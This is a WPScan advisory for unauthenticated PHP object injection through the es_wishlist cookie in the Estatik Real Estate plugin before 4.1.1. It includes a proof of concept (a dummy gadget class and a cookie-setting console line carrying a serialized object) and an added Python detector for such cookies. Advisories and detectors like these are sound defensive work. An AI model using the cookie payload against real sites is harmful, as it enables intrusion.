wpvulndb
Krzysztof Zając (CERT PL)
WPVDB-ID: 8CFD8C1F-2834-4A94-A3FA-C0CFBE78A8B7
History: Dec 25, 2023 - 12:00 a.m.

Estatik Real Estate Plugin < 4.1.1 - Unauthenticated PHP Object Injection

wpscan.com
estatik real estate
unauthenticated user
php object injection
gadget chain
developer console

AI Score: 7.2 High (Confidence: High)

EPSS: 0.003 Low (Percentile: 69.7%)

Description

The plugin unserializes user input via some of its cookies, which could allow unauthenticated users to perform PHP Object Injection when a suitable gadget chain is present on the blog.

PoC

To simulate a gadget chain, put the following code in a plugin:

    class Evil {
        public function __wakeup() : void {
            die("Arbitrary deserialization");
        }
    }

Then, run the command below in the developer console of the web browser while on the blog as an unauthenticated user, and reload the page to see the "Arbitrary deserialization" message:

    document.cookie='es_wishlist=O:4:"Evil":0:{}'
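For triage on sites still running an affected version, the check below (an added example, not part of the WPScan entry or the plugin's code) scans Cookie request headers for serialized PHP objects in the es_wishlist cookie named in the PoC. The function names, the regular expression and the sample headers are constructed for this illustration; pass watched=None to inspect every cookie, since the entry says more than one cookie is affected without naming the others.

```python
import re
from urllib.parse import unquote

# PHP serialize() writes objects as O:<len>:"Class":<count>:{...} (or C:... for
# Serializable classes). Searching the whole value also catches an object
# nested inside an array, e.g. a:1:{i:0;O:4:"Evil":0:{}}.
OBJECT_TOKEN = re.compile(r'(?<![A-Za-z0-9])[OC]:(\d+):"([^"]+)":\d+:\{')

# Constructed sample Cookie headers (not captured traffic).
SAMPLE_HEADERS = [
    'wordpress_test_cookie=WP%20Cookie%20check; es_wishlist=O:4:"Evil":0:{}',
    'es_wishlist=a%3A1%3A%7Bi%3A0%3BO%3A4%3A%22Evil%22%3A0%3A%7B%7D%7D',
    'es_wishlist=a%3A2%3A%7Bi%3A0%3Bi%3A12%3Bi%3A1%3Bi%3A34%3B%7D',
]

def parse_cookie_header(header):
    """Split a raw Cookie request header into (name, value) pairs."""
    pairs = []
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            pairs.append((name, value))
    return pairs

def serialized_classes(value):
    """Class names of serialized PHP objects found in one cookie value."""
    decoded = unquote(value)  # PHP URL-decodes cookie values before the plugin reads them
    # Keep only tokens whose declared length matches the class name (fewer false positives).
    return [m.group(2) for m in OBJECT_TOKEN.finditer(decoded)
            if int(m.group(1)) == len(m.group(2).encode())]

def flag_cookies(header, watched=("es_wishlist",)):
    """Map each watched cookie that carries a serialized object to its class names."""
    hits = {}
    for name, value in parse_cookie_header(header):
        classes = serialized_classes(value)
        if classes and (watched is None or name in watched):
            hits[name] = classes
    return hits

if __name__ == "__main__":
    for h in SAMPLE_HEADERS:
        print(flag_cookies(h) or "clean", "<-", h)
```

A hit means a client supplied an object where the cookie should hold plain data; the third sample, a serialized array of integers, passes as clean.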

CPE | Name | Operator | Version
- | - | eq | 4.1.1
